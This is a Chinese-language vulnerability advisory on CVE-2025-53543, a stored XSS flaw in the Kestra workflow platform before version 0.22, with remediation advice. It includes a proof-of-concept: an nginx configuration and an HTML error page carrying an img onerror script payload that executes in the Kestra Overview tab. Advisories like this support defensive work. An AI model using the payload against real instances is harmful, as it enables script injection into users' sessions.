Kestra 0.22之前版本存在的XS漏洞CVE-2025-53543

Kestra是基于Java的分布式数据工作流调度平台，专为快速构建和管理复杂数据管道而设计，适合于需要自动化业务流程和数据处理项目。

Kestra作为一个开源的工作流自动化平台，它通过声明式的 YAML 语法，从而让用户能够轻松定义、调度和执行复杂的数据管道和工作流。

一、基本情况

Kestra作为一个现代化的编排工具，提供了强大的任务编排能力、丰富的插件生态系统以及直观的用户界面，可实现高效工作流编排和执行。

相较于传统的工作流编排工具，Kestra在扩展性、稳定性和易用性方面表现更为出色，这就使用户能在大规模环境下轻松应对数据处理挑战。

栋科技漏洞库关注到Kestra工作流编排平台在0.22之前的版本中存在一个安全漏洞，漏洞现已追踪为CVE-2025-53543，漏洞CVSS评分4.2。

二、漏洞分析

CVE-2025-53543漏洞源于平台没有未处理收到的HTTP响应，从而导致在执行“概述”选项卡中的错误消息时，容易受到存储的XSS的攻击。

该漏洞的存在，可能导致Kestra工作流编排平台在0.22之前的版本在执行自定义JS代码时导致Kestra的OSS实例受损，因此建议尽快修复。

三、POC验证测试

1、托管web服务器，该服务器将返回包含任何错误代码的响应，并在响应中包含JS有效负载，配置示例：

nginx配置

server {
    listen 80;
    server_name your.domain.com;

    location / {
        return 504;
    }

    error_page 504 /504_custom.html;

    location = /504_custom.html {
        root /var/www/html;
        internal;
    }
}

/var/www/html/504_custom.html

<!DOCTYPE html>
<html>
<head>
    <title>504 Gateway Timeout</title>
</head>
<body>
    <h1>504 Gateway Timeout</h1>
    <img src='#' onerror=alert(location.host) />
</body>
</html>

2、创建将在此端点上处理http请求的示例流

管理员已设置登录后刷新可查看

3、执行流程，一旦执行出现错误，请导航到当前执行的“概述”页面

4、它将呈现来自页面的响应，并在当前Kestra实例的上下文中执行JavaScript代码

四、影响范围

Kestra < 0.22

五、修复建议

Kestra >= 0.22

六、参考链接

管理员已设置登录后刷新可查看